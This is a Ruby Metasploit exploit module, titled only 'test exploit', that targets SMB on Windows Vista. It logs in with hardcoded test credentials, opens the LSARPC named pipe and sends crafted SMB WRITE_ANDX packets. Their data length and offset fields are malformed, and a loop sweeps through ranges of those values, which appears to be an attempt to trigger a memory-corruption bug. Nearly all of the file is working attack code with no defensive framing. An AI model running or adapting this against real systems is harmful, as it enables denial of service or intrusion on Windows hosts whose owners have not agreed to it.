require 'msf/core' module Msf module Exploits module Test class BugTest < Msf::Exploit::Remote include Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'test exploit', 'Description' => "tests", 'Author' => 'tests', 'License' => MSF_LICENSE, 'Version' => '$Revision: 0 $', 'Arch' => 'x86', 'Payload' => { 'Space' => 1000 }, 'Targets' => [ [ 'Windows VISTA', { 'Platform' => 'win' } ], ], 'DefaultTarget' => 0)) end def subexploit(dlenlow, doffset,fillersize) print_line("1") datastore['SMBUser']='testuser' datastore['SMBPass']='testuser' datastore['SMBDomain']='COBAYA' datastore['SMBName']='COBAYA' print_line("2") connect() print_line("3") smb_login() print_line("4") pkt = CONST::SMB_CREATE_PKT.make_struct pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['WordCount'] = 24 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileNameLen'] = 14 pkt['Payload'].v['CreateFlags'] = 0x16 pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0x400040 pkt['Payload'].v['Impersonation'] = 2 pkt['Payload'].v['Disposition'] = 1 pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" simple.client.smb_send(pkt.to_s) print_line("5") ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX) pkt = CONST::SMB_WRITE_PKT.make_struct data_offset = pkt.to_s.length - 4 print_line("6") filler = Rex::Text.rand_text(fillersize) print_line("7") pkt['Payload']['SMB'].v['Signature1']=0xcccccccc pkt['Payload']['SMB'].v['Signature2']=0xcccccccc pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['WordCount'] = 14 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID'] pkt['Payload'].v['Offset'] = 0 pkt['Payload'].v['Reserved2'] = -1 pkt['Payload'].v['WriteMode'] = 8 pkt['Payload'].v['Remaining'] = fillersize pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['DataLenLow'] = dlenlow #<================== pkt['Payload'].v['DataOffset'] = doffset #<==== pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<==== pkt['Payload'].v['ByteCount'] = fillersize#<==== pkt['Payload'].v['Payload'] = filler print_line("8") simple.client.smb_send(pkt.to_s) print_line("9") end def exploit k=72 j=0xffff while j>10000 i=0xffff while i>10000 begin print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}") subexploit(i,j,k) rescue print_line("rescue") end i=i-10000 end j=j-10000 end end end end end end